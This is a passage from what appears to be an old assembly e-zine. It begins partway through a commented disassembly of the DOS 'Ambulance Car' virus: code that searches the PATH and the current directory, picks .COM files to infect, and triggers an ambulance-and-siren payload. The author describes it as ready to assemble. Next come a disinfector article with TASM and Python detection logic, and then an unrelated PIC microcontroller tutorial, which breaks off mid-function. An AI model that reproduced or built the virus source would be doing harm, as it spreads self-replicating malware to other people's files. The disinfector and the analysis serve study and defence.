; lower bits of BP being set) is 1/4 (25%), while probability of searching in
; the PATH for a directory where to infect (one or both of the first two lower
; bits of BP being set) is 3/4 (75%)
test bp, 00000011b ; Check if we are to infect in
jz check_cur_dir ; the current directory or in
; a PATH directory
; Find the PATH string in the environment block
;
; Format of environment block (from Ralf Brown's Interrupt List):
;
; Offset Size Description
; ------ ---- -----------
; 00h N BYTEs first environment variable, ASCIIZ string of form "var=value"
; N BYTEs second environment variable, ASCIIZ string
; ...
; N BYTEs last environment variable, ASCIIZ string of form "var=value"
; BYTE 00h
;---DOS 3.0+ ---
; WORD number of strings following environment (normally 1)
; N BYTEs ASCIIZ full pathname of program owning this environment
; (other strings may follow)
xor bx, bx ; Point to the first character
check_if_PATH:
mov ax, es:[bx]
cmp ax, 'AP'
jne not_PATH
cmp word ptr es:[bx+2], 'HT'
je PATH_found
not_PATH:
inc bx
or ax, ax ; Check if both AH and AL are
jnz check_if_PATH ; equal to zero (meaning the
; standard environment block
; is over)
; Setup to check in the current directory
check_cur_dir:
lea di, [si+file_mask-4] ; Point to file mask holder
jmp short find_file
; Find a directory in the PATH
PATH_found:
add bx, 5 ; Point to after 'PATH='
find_dir:
lea di, [si+pathname-4] ; Point to PATH name holder
get_character:
mov al, es:[bx]
inc bx
or al, al ; Are we at the end of this
jz patch_dir ; PATH string?
cmp al, ';' ; Is this a PATH directory
je check_if_this_one ; separator?
mov [di], al ; Write this character to the
inc di ; PATH name holder
jmp short get_character
check_if_this_one:
cmp byte ptr es:[bx], 0 ; Are we at the end of this
je patch_dir ; PATH string?
shr bp, 1 ; Get rid of the first two
shr bp, 1 ; lower bits, because it's
; already known that at least
; one of them is set
; Which directory to choose
;
; Probability of infecting in the found directory (none of the first two
; lower bits of BP being set) is 1/4 (25%), while probability of searching in
; the PATH for another directory where to infect (one or both of the first two
; lower bits of BP being set) is 3/4 (75%)
test bp, 00000011b ; Check if we are to search for
jnz find_dir ; files in this directory or
; not
patch_dir:
cmp byte ptr [di-1], '\' ; Does the directory already
je find_file ; have an ending '\'?
mov byte ptr [di], '\' ; If not, then add one
inc di
; Find a file to infect
find_file:
push ds
pop es
mov [si+filename_ptr-4], di ; Save current location within
; the pathname/file_mask
mov ax, '.*' ; Set file mask
stosw
mov ax, 'OC'
stosw
mov ax, 'M'
stosw
push es
mov ah, 2Fh ; Get Disk Transfer Address
int 21h ; (DTA)
; [returns ES:BX - Address of
; current DTA]
mov ax, es
mov word ptr [si+DTA_seg-4], ax ; Save DTA segment
mov word ptr [si+DTA_off-4], bx ; Save DTA offset
pop es
lea dx, [si+new_DTA-4] ; Setup new DTA
mov ah, 1Ah ; Set Disk Transfer Address
int 21h ; [on entry DS:DX - Address of
; DTA]
lea dx, [si+file_mask-4] ; Setup file mask (with or
; without a PATH directory)
xor cx, cx ; Search for normal files only
mov ah, 4Eh ; Find First Matching File
int 21h ; [on entry CX - File
; attribute; DS:DX - pointer
; to filespec (ASCIIZ string)
jnc file_found ; File found? (and no errors?)
; If no file found, then clear the file mask
xor ax, ax
mov word ptr [si+file_mask-4], ax
jmp short restore_DTA
; Check if we are to infect this file or find another one
;
; Probability of keeping the found file is 1/8 (12.5%) while probability of
; searching for another one is 7/8 (87.5%)
file_found:
push ds
mov ax, BDA_addr
mov ds, ax
ror bp, 1
xor bp, ds:BDA_timer_counter
pop ds
test bp, 00000111b
jz file_picked ; Keep this file?
; If not, then...
mov ah, 4Fh ; Find Next Matching File
int 21h
jnc file_found ; File found? (and no errors?)
; Either a file was picked or no more files were found (so keep last one)
file_picked:
mov di, [si+filename_ptr-4] ; Point to after path, if any
lea bx, [si+f_name-4]
; Copy the file name of the found file to our filename/pathname holder
store_filename:
mov al, [bx]
inc bx
stosb
or al, al ; Is the file name over?
jnz store_filename ; If not, then copy the next
; character
restore_DTA:
mov bx, word ptr [si+DTA_off-4] ; Get old DTA offset
mov ax, word ptr [si+DTA_seg-4] ; Get old DTA segment
push ds
mov ds, ax
mov ah, 1Ah ; Set Disk Transfer Address
int 21h
pop ds
retn
search endp
; Check if payload will be shown or not
;--------------------------------------
payload proc near
; Check if payload will be shown
;
; The payload will be shown only when the counter-of-opened-files matches
; ...x110 (in binary) which happens at: 6, 14, 22, 30, 38, ... 65534. Then,
; when the counter reaches its limit (65535) and goes back to zero, everything
; starts again. So probability of the payload being shown is 1/8 (12.5%) and
; of not is 7/8 (87.5%)
push es
mov ax, word ptr [si+counter-4]
and ax, 00000111b
cmp ax, 00000110b ; Show payload every eighth
jne exit_payload ; (starting with the sixth)
; time
; Did we already show the payload? (since the computer was (re)booted)
mov ax, BDA_addr
mov es, ax
mov ax, es:BDA_LPT3_port_addr
or ax, ax ; If the LPT3 port is in use,
jnz exit_payload ; don't show payload
; Mark LPT3 port as in use, so that the payload won't be shown again
inc word ptr es:BDA_LPT3_port_addr
call show_payload
exit_payload:
pop es
retn
payload endp
; Setup and show the 'ambulance car' payload
;-------------------------------------------
show_payload proc near
; Check video mode
;
; Text mode 3 (80x25) - video buffer address = 0B800h
; Text mode 7 (80x25) - video buffer address = 0B000h
push ds
mov di, 0B800h
mov ax, BDA_addr
mov ds, ax
mov al, ds:BDA_video_mode
cmp al, 7 ; Check which video mode we're
jne setup_video_n_tune ; on, if not Monochrome text
mov di, 0B000h ; mode 7, assume mode 3
setup_video_n_tune:
mov es, di
pop ds
mov bp, 0FFF0h ; Setup number of tones to play
; (will increment up to 50h)
setup_animation:
mov dx, 0 ; Setup ambulance_data column
mov cx, 16 ; Number of characters that make
; up one ambulance_data line
do_ambulance:
call show_ambulance ; Print the ambulance to screen
inc dx
loop do_ambulance
call play_siren ; Play a tone of the 'siren'
call wait_tick ; and wait for a tick
inc bp
cmp bp, 50h ; Already played the 'ambulance
jne setup_animation ; siren' tune 12 times?
call speaker_off ; If yes, then turn speaker off
push ds
pop es
retn
show_payload endp
; Turn the PC speaker off
;------------------------
speaker_off proc near
; Turn off the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; (see description below)
in al, 61h
and al, 11111100b ; Disable timer channel 2 and 'ungate'
out 61h, al ; its output to the speaker
retn
speaker_off endp
; Turn on the speaker and play the "ambulance siren" sound
;------------------------------------------------------------
play_siren proc near
; Select tone frequency to generate
;
; Tone frequency is selected by means of the 3rd least significant bit of BP:
;
; Bit(s) Description
; ------ -----------
; ... 3 2 1 0
; ... x 0 x x Play 1st tone frequency
; ... x 1 x x Play 2nd tone frequency
;
; If we consider A to be the 1st tone and B to be the 2nd tone then the whole
; 'ambulance siren' tune will be: (AAAABBBB) x 12
mov dx, 07D0h ; "ambulance siren" 1st tone frequency
test bp, 00000100b ; Check if we are to play
jz speaker_on ; the first or the second
; tone frequency
mov dx, 0BB8h ; "ambulance siren" 2nd tone frequency
; Turn on the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; Bit(s) Description
; ------ -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 1 Timer 2 gate to speaker enable
; . . . . . . 1 . Speaker data enable
; x x x x x x . . Other non-concerning fields
speaker_on:
in al, 61h
test al, 00000011b ; If speaker is already on, then go and
jnz play_tone ; play the sound tone
or al, 00000011b ; Else, enable timer channel 2 and
out 61h, al ; 'gate' its output to the speaker
; Program the PIT
;
; 8253 PIT - Programmable Interval Timer
; Port 43h, 8253 Mode Control Register
;
; Bit(s) Description
; ------ -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 0 16-bit binary counter
; . . . . 0 1 1 . Mode 3, square wave generator
; . . 1 1 . . . . Read/Write LSB, followed by write of MSB
; 1 0 . . . . . . Select counter (channel) 2
mov al, 10110110b ; Set 8253 command register
out 43h, al ; for mode 3, channel 2, etc
; Generate a tone from the speaker
;
; 8253 PIT - Programmable Interval Timer
; Port 42h, 8253 Counter 2 Cassette and Speaker Functions
play_tone:
mov ax, dx
out 42h, al ; Send LSB (Least Significant Byte)
mov al, ah
out 42h, al ; Send MSB (Most Significant Byte)
retn
play_siren endp
; Show the 'ambulance car'
;-------------------------
show_ambulance proc near
push cx
push dx
lea bx, [si+ambulance_data-4]
add bx, dx ; Setup which ambulance_data column
; we're going to print
add dx, bp ; Don't show the ambulance_data columns
or dx, dx ; which aren't still visible
js ambulance_done
cmp dx, 50h ; Check if the column we're printing is
jae ambulance_done ; past the screen limit
; If yes, then don't print it
mov di, 3200 ; Point to beginning of screen's 21st
; line (row 20: 3200 / 160 bytes per line)
add di, dx ; Point to the column we're supposed to
add di, dx ; be printing at
sub dx, bp ; Restore to initial column value
mov cx, 5 ; Set it up so we're in the first line
decode_character:
mov ah, 7 ; Set color attribute to white
; Decode the character
;
; It's really pretty ingenious: each character is encoded in such a way that
; for each line beyond the first one the character is incremented by one, and
; for each column beyond the first the same thing happens. Taking that into
; account, it's not difficult to understand how it all works and how to decode
; the ambulance_data
mov al, [bx] ; Get the character
sub al, 7
add al, cl ; Account for which line we're in
sub al, dl ; Account for which column we're in
cmp cx, 5 ; Are we in the first line?
jne print_character ; If we are, then...
mov ah, 15 ; Set color attribute to high-intensity
; white
test bp, 00000011b ; Is this the first tone of an AAAA or
; BBBB tune sequence?
jz print_character ; If so, then go ahead and print the
; 'siren' characters
mov al, ' ' ; Else, replace them with a ' ' (to
; accomplish the visual 'siren' effect)
print_character:
stosw ; Print the character to screen
add bx, 16 ; Point to next ambulance_data line
add di, 158 ; Point to next screen line
loop decode_character
ambulance_done:
pop dx
pop cx
retn
show_ambulance endp
; Wait for one tick (18.2 per second) to pass
;--------------------------------------------
wait_tick proc near
push ds
mov ax, BDA_addr
mov ds, ax
mov ax, ds:BDA_timer_counter ; Get ticks since midnight
check_timer:
cmp ax, ds:BDA_timer_counter ; Check if one tick has
je check_timer ; already passed
pop ds
retn
wait_tick endp
;--- Data from here below
ambulance_data:
first_line db 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh
db 2Dh, 2Eh, 2Fh, 30h, 31h
second_line db 23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h
db 0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h
third_line db 24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h
db 0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h
fourth_line db 25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h
db 0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh
fifth_line db 26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh
db 0EFh, 0F0h, 32h, 62h, 34h, 0F4h
; Here's how the ambulance looks - see under DOS (box):
;
; \|/
; ÜÜÜÜÜÜÜÜÛÜÜÜ
; ÛÛÛÛß ßÛÛÛ \
; ÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛ
; ßß OO ßßßßß O ß
counter dw 9
jump_code:
near_jump db 0E9h
relative_offset db 36h, 00h
first_3bytes db 3 dup (?)
file_handle dw ?
virus_body:
original_3bytes db 0CDh, 20h ; 'int 20h' opcode
db 90h ; 'nop' opcode
;--- Stuff that gets saved along with the virus ends here
six_bytes db 6 dup (?)
filename_ptr dw ?
DTA_seg dw ?
DTA_off dw ?
file_mask:
filename:
pathname db 6 dup (?)
db 7 dup (?)
db 67 dup (?)
new_DTA:
reserv db 21 dup (?)
f_attr db ?
f_time dw ?
f_date dw ?
f_size dd ?
f_name db 13 dup (?)
filler db 85 dup (?)
_TEXT ends
end ambulance_car
---------------------------------------------------------------------------8<--
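The character decoding in show_ambulance can also be tried outside DOS. The
following Python sketch is only a model and not part of the original listing.
It assumes that cl counts the lines down from 5 to 1 and that dl holds the
column number starting at 0 (both inferred from the comments and the data,
since the loop set-up is not visible in the decoding step itself), and it
relies on Python's cp437 codec to turn the decoded bytes into characters.

```python
# Model of the decoding step: al = byte - 7 + cl - dl.
# Assumptions: cl runs 5..1 over the lines, dl runs 0..15 over the columns.
AMBULANCE_DATA = [
    [0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29,
     0x66, 0x87, 0x3B, 0x2D, 0x2E, 0x2F, 0x30, 0x31],
    [0x23, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6,
     0xE7, 0xE7, 0xE9, 0xEA, 0xEB, 0x30, 0x31, 0x32],
    [0x24, 0xE0, 0xE1, 0xE2, 0xE3, 0xE8, 0x2A, 0xEA,
     0xE7, 0xE8, 0xE9, 0x2F, 0x30, 0x6D, 0x32, 0x33],
    [0x25, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE7, 0xE7,
     0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF],
    [0x26, 0xE6, 0xE7, 0x29, 0x59, 0x5A, 0x2C, 0xEC,
     0xED, 0xEE, 0xEF, 0xF0, 0x32, 0x62, 0x34, 0xF4],
]


def decode_line(line_index, encoded):
    """Undo the per-line and per-column offsets of one 16-byte line."""
    cl = 5 - line_index  # line counter as the loop instruction sees it
    return bytes((b - 7 + cl - dl) & 0xFF for dl, b in enumerate(encoded))


def decode_ambulance(data=AMBULANCE_DATA):
    """Return the five screen lines as text."""
    return [decode_line(i, row).decode("cp437") for i, row in enumerate(data)]


for row in decode_ambulance():
    print(row)
```

Every line starts with a blank column, which is why the first byte of each
line is simply 20h plus the line's offset.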
Special Thanks
--------------
I would like to thank Cicatrix for sending me his collection of 'Ambulance Car'
strains, so that I would have more than two variants to study and compare.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
'Ambulance Car' Disinfector
by Chili
Since I provided a ready-to-be-assembled virus in the "'Ambulance Car'
Disassembly" article, I decided to also write a bonus article with a basic
disinfector for it. Please note that this disinfector doesn't locate and clean
all existing 'Ambulance Car' strains, though it does work on more than half of
the strains I have (thanks Cicatrix). It is only intended to work with the
strain I provided, so no assurances are given as to whether it will do the job
or not with other strains (it also works with the 'RedXAny' strain look-alike
and with the tamed version that only displays the payload - this tamed version
really isn't a virus since it doesn't replicate and so F-PROT won't report it;
the disinfector does report and clean it though).
An infected file can easily be cleaned by hand, so you should try that first.
The disinfector will scan all .COM files in the current directory for three
things: 1. the '0E9h' near jump code (other strains may have the '0EBh' jump
code - this won't detect them!); 2. the delta offset calculation routine
pointed to by the near jump; 3. the ambulance data at the end of the virus (if
you change this into something else the disinfector will report this file as
suspicious). Upon a suspicious or infected file report the user will be given a
chance to clean it or continue on to the next file.
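To make the three checks and the cleaning step easier to follow, here is a
rough Python model of them. It is a sketch only, working on a file image held
in memory instead of going through DOS file handles; the function names are
made up for this illustration, while the byte values and offsets are the ones
used in the listing below.

```python
# Bytes KILLREDX expects at the jump target (delta offset calculation).
DELTA_CODE = bytes([0xE8, 0x01, 0x00, 0x01, 0x5E, 0x81, 0xEE])
# Last two ambulance data bytes, found 15 bytes before the end of the file.
AMBULANCE_TAIL = bytes([0x34, 0xF4])


def virus_start(image):
    """Checks 1 and 2: return the offset the near jump points to, or None."""
    if len(image) < 3 or image[0] != 0xE9:
        return None
    start = (int.from_bytes(image[1:3], "little") + 3) & 0xFFFF
    if image[start:start + 7] != DELTA_CODE:
        return None
    return start


def classify(image):
    """Return 'clean', 'infected' or 'suspicious' (check 3 decides)."""
    if virus_start(image) is None:
        return "clean"
    if len(image) >= 15 and image[-15:-13] == AMBULANCE_TAIL:
        return "infected"
    return "suspicious"


def disinfect(image):
    """Restore the host's first 3 bytes and cut the file at the virus start."""
    start = virus_start(image)
    if start is None:
        return image
    return image[-3:] + image[3:start]
```

As in the real disinfector, a file that passes the first two checks but fails
the third is only reported as suspicious, and cleaning it is a gamble.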
And here is the disinfector:
[NOTE: F-PROT will report this as a new or modified variant of SillyC - go
figure!]
--8<---------------------------------------------------------------------------
; 'Ambulance Car' Disinfector
; KILLREDX by Chili for APJ #6
; Assemble with (TASM 4.1):
; tasm /ml /m2 killredx.asm
; tlink /t killredx.obj
LF equ 0Ah ; 'Line Feed' ASCII code
CR equ 0Dh ; 'Carriage Return' ASCII code
_TEXT segment word public 'code'
assume cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT
org 100h
killredx proc far
;--- Print program identification message
lea si, killredx_msg
call print_ASCIIZ
;--- Find first .COM file
lea dx, com_mask
xor cx, cx
mov ah, 4Eh
int 21h
jnc open_file
jmp exit
open_file:
;--- Print found file's name
lea si, newline_msg
call print_ASCIIZ
mov si, 9Eh
call print_ASCIIZ
;--- Open found file
mov dx, 9Eh
mov ax, 3D02h
int 21h
jnc read_jump
;--- Print open error message
lea si, open_msg
call print_ASCIIZ
jmp find_next
read_jump:
;--- Read jump code
xchg ax, bx
mov cx, 3
lea dx, jump_code
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je check_jump
jmp close_file
check_jump:
;--- Compare with known virus' jump code
cmp byte ptr [jump_code], 0E9h
je read_displacement
jmp close_file
read_displacement:
;--- Move file pointer to jump offset
mov dx, word ptr [jump_code+1]
add dx, 3
xor cx, cx
mov ax, 4200h
int 21h
;--- Read displacement calculation code
mov cx, 7
lea dx, displace_code
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je check_displacement
jmp close_file
check_displacement:
;--- Compare with known virus' displacement calculation code
cmp word ptr [displace_code], 01E8h
jne exit_check
cmp word ptr [displace_code+2], 0100h
jne exit_check
cmp word ptr [displace_code+4], 815Eh
jne exit_check
cmp byte ptr [displace_code+6], 0EEh
jne exit_check
jmp read_data
exit_check:
jmp close_file
read_data:
;--- Move file pointer to supposed data location
mov cx, 0FFFFh
mov dx, 0FFF1h
mov ax, 4202h
int 21h
;--- Read ambulance data
mov cx, 2
lea dx, ambulance_data
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je check_data
jmp close_file
read_error:
;--- Print read error message
lea si, read_msg
call print_ASCIIZ
jmp close_file
check_data:
;--- Compare with known virus' ambulance data
cmp word ptr [ambulance_data], 0F434h
jne suspicious
;--- Print file infected or suspicious message
lea si, infected_msg
jmp askto_clean
suspicious:
lea si, suspicious_msg
askto_clean:
;--- Print and read answer to whether clean file or not
call print_ASCIIZ
mov ah, 08h
int 21h
cmp al, 'y'
je clean_file
cmp al, 'Y'
je clean_file
jmp close_file
clean_file:
;--- Move file pointer to supposed original bytes location
mov cx, 0FFFFh
mov dx, 0FFFDh
mov ax, 4202h
int 21h
;--- Read host's original (first 3) bytes
mov cx, 3
lea dx, original_bytes
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je write_original
jmp close_file
write_original:
;--- Move file pointer to beginning of file
xor cx, cx
xor dx, dx
mov ax, 4200h
int 21h
;--- Write original bytes
mov cx, 3
lea dx, original_bytes
mov ah, 40h
int 21h
jc write_error
cmp ax, cx
je truncate_file
write_error:
;--- Print write error message
lea si, write_msg
call print_ASCIIZ
jmp close_file
truncate_file:
;--- Move file pointer to virus' jump offset (real virus start)
mov dx, word ptr [jump_code+1]
add dx, 3
xor cx, cx
mov ax, 4200h
int 21h
;--- Truncate file
mov cx, 0
mov ah, 40h
int 21h
jc write_error
cmp ax, cx
jne write_error
lea si, disinfected_msg
call print_ASCIIZ
close_file:
;--- Close file
mov ah, 3Eh
int 21h
find_next:
;--- Find next matching file
mov ah, 4Fh
int 21h
jc exit
jmp open_file
exit:
;--- Exit to DOS
lea si, newline_msg
call print_ASCIIZ
retn
killredx endp
print_ASCIIZ proc near
;--- Print an ASCIIZ string
lodsb
cmp al, 0
je end_ASCIIZ
xchg al, dl
mov ah, 02h
int 21h
jmp print_ASCIIZ
end_ASCIIZ:
retn
print_ASCIIZ endp
killredx_msg db "'Ambulance Car' Disinfector", LF, CR
db "KILLREDX by Chili for APJ #6", LF, CR, 0
newline_msg db LF, CR, 0
infected_msg db " Infected. Clean [y/n]?", 0
suspicious_msg db " Suspicious. Attempt to clean", 0FBh, " (", 0FBh ; 0FBh = CP437 check mark
db " WARNING: file may "
db "be corrupted if infected by an unknown/unsupported "
db "strain of Ambulance Car) [y/n]?", 0
disinfected_msg db LF, CR, " Disinfected.", 0
open_msg db LF, CR, " [ERROR: opening file]", 0
read_msg db LF, CR, " [ERROR: reading from file]", 0
write_msg db LF, CR, " [ERROR: writing to file]", 0
com_mask db "*.COM", 0
jump_code db 3 dup (?)
displace_code db 7 dup (?)
ambulance_data dw ?
original_bytes db 3 dup (?)
_TEXT ends
end killredx
---------------------------------------------------------------------------8<--
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Assembling for PIC's
Jan Verhoeven
Below is a piece of assembly language for the Microchip PIC processor. This
particular program will flash some LED's and activate some relays based on the
status of some control inputs. The target MCU was the PIC 16C54, one of the
simplest chips in that range.
To give some indication of what we're up to:
RAM             25 bytes
ROM             512 words (of 12 bits each)
I/O             12 bits
Clockspeed      8 kHz (this project, max = 4 MHz)
Instructions    33
On-Chip-Stack   2 levels
Compare this to a modern PC clone....
RISC and Harvard architecture.
------------------------------
The PIC line of MCU's are RISC chips built on the Harvard architecture, and
one of the results is that they have separate code and data memories.
Higher PIC's have more features, like INTerrupt sources on 4 or more pins,
internal interrupts etcetera. All models have a watchdogtimer (WDT) which
needs to be reset regularly (if enabled) else the MCU will reset itself.
The PIC registers.
------------------
The register architecture of the PIC is somewhat odd to Intel programmers, but
programming resembles that of the Hewlett Packard HP 11 range of calculators.
Here is an overview of the register set. Microchip refers to this as the
"register file".
file address   name             comment
------------   --------------   -----------------------------------
00             indirect         not a real register! Accesses the
                                file that FSR points to
01             RTCC             timer counter
02             PC (or IP)       lower 8 bits of it
03             STATUS           flags register
04             FSR              pointer for indirect access, also
                                bank select on the PIC 16C57
05             Port A           has 4 I/O lines
06             Port B           has 8 I/O lines
07             Port C           8 I/O, only 16C55 and 16C57
               GP register      on 'C54 and 'C56
08             GP register      General purpose register
..             ..               ..
1F             GP register      General purpose register
Besides these "transparent registers" there are also some hidden registers
(which also are write only...) for processor control. These are:
TRISA    The "tristate A/B/C" registers determine the status
TRISB    of each pin of the I/O ports.
TRISC    A "1" makes it an input and a "0" makes it an output.
OPTION   is for controlling the WDT and the RTCC
And there's the ubiquitous "W" register. This is the "Working register" and is
used to haul data back and forth. PIC registers (or "files") cannot process
constants (or "literals"). This can only be done with the W-file. It takes
some getting used to, but the concept is simple and straightforward and
eventually you will get used to it and learn to appreciate it.
From that moment on, you will only have to get used to the fact that data does
not always end up where you would like to have it. All instructions that
operate on W and F (any register or file) end with a "d" option. If "d" is a
"1", the destination is the file F; if "d" is "0", the result will be stored
in the W file...
This took me some time to get used to and still is the main source of errors.
Apart from having selected the wrong oscillator and not disabling the WDT....
The PIC instructions.
---------------------
The instructions for the PIC 16C54 are as follows:
mnemonic        description
-------------   ---------------------------------------------
ADDWF  F, d     d := W + F
ANDLW  k        W := W AND k
ANDWF  F, d     d := W AND F
BCF    F, b     bit b in F is cleared (i.e. made zero)
BSF    F, b     bit b in F is set (i.e. made one)
BTFSC  F, b     if bit b in F is CLEAR, skip next instruction
BTFSS  F, b     if bit b in F is SET, skip next instruction
CALL   k        push PC, PC := k
CLRF   F        Clear file F
CLRW            Clear file W
CLRWDT          Clear Watchdogtimer
COMF   F, d     d := NOT F (1's complement)
DECF   F, d     d := F - 1
DECFSZ F, d     d := F - 1; If 0 => skip next instruction
GOTO   k        PC := k
INCF   F, d     d := F + 1
INCFSZ F, d     d := F + 1; If 0 => skip next instruction
IORLW  k        W := W OR k
IORWF  F, d     d := W OR F
MOVF   F, d     d := F (zero flag affected)
MOVLW  k        W := k
MOVWF  F        F := W
NOP             No operation
OPTION          OPTION := W
RETLW  k        W := k, pop PC
RLF    F, d     d := rotate left through carry (F)
RRF    F, d     d := rotate right through carry (F)
SLEEP           enter powerdown mode
SUBWF  F, d     d := F - W (2's complement)
SWAPF  F, d     d := swap-nibbles (F)
TRIS   F        TRIState information for I/O pins
XORLW  k        W := W XOR k
XORWF  F, d     d := W XOR F
Especially the "F, d" construct takes some getting used to.
Below is the source for the "LEGO controller":
--------------------------------------------------------------------------
title "LEGO 003"
subtitl "control LEGO technic devices"
LIST P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80
PIC54 equ 1FFH ; Define Reset Vectors
RTCC equ 1h ; define register designators
PC equ 2h ; the program counter is a register as well
STATUS equ 3h ; F3 Reg is STATUS Reg.
PORT_A equ 5h
PORT_B equ 6h ; I/O Port Assignments
RTCC_tc equ 0Dh ; time constant for RTCC
count_1 equ 0Eh ; delay counters and GP registers
count_2 equ 0Fh
file equ 1
w equ 0
flag_0 equ 0 ; input bits in RA port
flag_1 equ 1
flag_2 equ 2
flag_3 equ 3
LED_0 equ 0 ; status led 1, in RB Port
LED_1 equ 1 ; status led 2
RL_1 equ 2 ; relays 1 - 3
RL_2 equ 3
RL_3 equ 4
s_clk equ 5 ; s_clk input
s_data equ 6 ; s_data input
go equ 7
delay movlw .100 ; mov W with 100 decimal
movwf count_1 ; xfer W to register
dela_1 clrf count_2 ; count_2 = 0
dela_2 decfsz count_2, file ; count_2 = count_2 - 1
goto dela_2 ; skip this instruction if count_2 = 0, ...
decfsz count_1, file ; ... ending here: count_1 = count_1 - 1
goto dela_1 ; skip this instruction when count_1 = 0
retlw 0 ; ending here, if so.
flash bcf PORT_B, LED_1 ; flash LED's 0 and 1 as an acknowledgement
bsf PORT_B, LED_0 ; activate the LED's.
call delay ; wait a while
bcf PORT_B, LED_0 ; toggle the LED's
bsf PORT_B, LED_1
call delay ; wait a second!
bcf PORT_B, LED_1 ; turn LED_1 off as well.
retlw 0 ; return to caller with W = 0
RT_chk clrwdt ; clear the watchdog timer
btfsc RTCC, 7 ; RELAY_3 follows bit7 of RTCC
bcf PORT_B, RL_3
btfss RTCC, 7
bsf PORT_B, RL_3
movf RTCC, w
skpz ; internal macro for BTFSS STATUS, 2
retlw 0
movf RTCC_tc, w ; if RTCC has reached zero, reload it from the time constant
movwf RTCC
retlw 0
start clrf RTCC
clrf RTCC_tc ; clear RTCC and RTCC time constant
movlw B'00001111'
tris PORT_A ; define port A as inputs
movlw B'11100000'
tris PORT_B ; define port B as I/O
movlw B'00110111'
option ; define state of WDT, RTCC and prescaler
movlw B'00011100'
movwf PORT_B ; initialize port B
call flash ; signal READY
call flash
btfss PORT_B, s_clk ; if s_clkline low, check for mode 2 request
goto m_chk
repeat clrwdt ; clear watchdog timer
call flash
movf PORT_A, w ; read port A into W
andlw 3 ; mask off sensor inputs
skpnz ; skip next instruction if NonZero
goto set_tc ; flag_0 and _1 zero => define RTCC time constant
btfsc PORT_A, flag_0
goto t_left
btfsc PORT_A, flag_1
goto t_right
movf PORT_B, w
andlw B'11100000' ; mask s_clk, s_data and go (bits 5, 6 and 7), not the sum of the bit numbers
skpnz ; if no RESET condition, skip
goto start
call RT_chk
goto repeat
t_left btfsc PORT_A, flag_2 ; if in end position, do not turn at all
goto l_exit
bcf PORT_B, RL_1 ; else set direction for Turn Left
bsf PORT_B, RL_2
bsf PORT_B, LED_0 ; show direction with LED's
bcf PORT_B, LED_1
chk_fl2 btfsc PORT_A, flag_2 ; wait until home-position is reached
goto l_exit ; if so, get out
call RT_chk ; if not, check again
goto chk_fl2 ; until done
l_exit bsf PORT_B, RL_1 ; release relay 1
bcf PORT_B, LED_0 ; extinguish light 0
goto repeat ; jump back
t_right btfsc PORT_A, flag_3 ; if in end position, do not turn at all
goto r_exit
bcf PORT_B, RL_2 ; else set direction for Turn Right
bsf PORT_B, RL_1
bsf PORT_B, LED_1 ; show direction with LED's
bcf PORT_B, LED_0
chk_fl3 btfsc PORT_A, flag_3 ; wait until home position reached
goto r_exit
call RT_chk
goto chk_fl3
r_exit bsf PORT_B, RL_2 ; deactivate lights and relays
bcf PORT_B, LED_1
goto repeat
m_chk clrf count_1 ; check inputs and make sure there's no glitch
clrf count_2
m_chk_1 btfss PORT_B, s_clk
decf count_1, file ; count pulses s_clkline = low
decfsz count_2, file
goto m_chk_1
movf count_1, w ; w = low-pulses
subwf count_2, w ; if count_1 <> count_2, glitch occurred
skpz
goto start
set_tc movf RTCC, w ; move current value of RTCC
movwf RTCC_tc ; to time constant register
goto repeat
org PIC54 ; goto highest word in code space
goto start ; and place the reset vector.
end
--------------------------------------------------------------------------
If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional
jumps may ring a bell. I don't know how the HP machines handle these jumps,
but the PIC line does the following:
condition   action by PIC
---------   -----------------------------------
FALSE       execute next instruction
TRUE        replace next instruction with a NOP
This enables the programmer to make 100% accurate timingloops, since a
skipped instruction takes up exactly as much time as an executed
single-cycle instruction would.
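As an illustration of how predictable this makes things, the length of the
"delay" routine from the listing above can be counted exactly. The Python
sketch below is a model, not something taken from the original project. It
assumes the usual PIC timing: one instruction cycle per instruction, and two
for anything that changes the program counter (goto, call, retlw and a skip
that is taken).

```python
def delay_cycles(outer=100):
    """Count the instruction cycles spent inside 'delay' (call not included)."""
    cycles = 2                      # movlw .100 / movwf count_1
    count_1 = outer
    while True:
        cycles += 1                 # dela_1: clrf count_2
        count_2 = 0
        while True:
            count_2 = (count_2 - 1) & 0xFF   # dela_2: decfsz count_2, file
            if count_2 == 0:
                cycles += 2         # skip taken: the goto becomes a NOP
                break
            cycles += 1 + 2         # decfsz (1) + goto dela_2 (2)
        count_1 = (count_1 - 1) & 0xFF       # decfsz count_1, file
        if count_1 == 0:
            cycles += 2             # skip taken, fall through to retlw
            break
        cycles += 1 + 2             # decfsz (1) + goto dela_1 (2)
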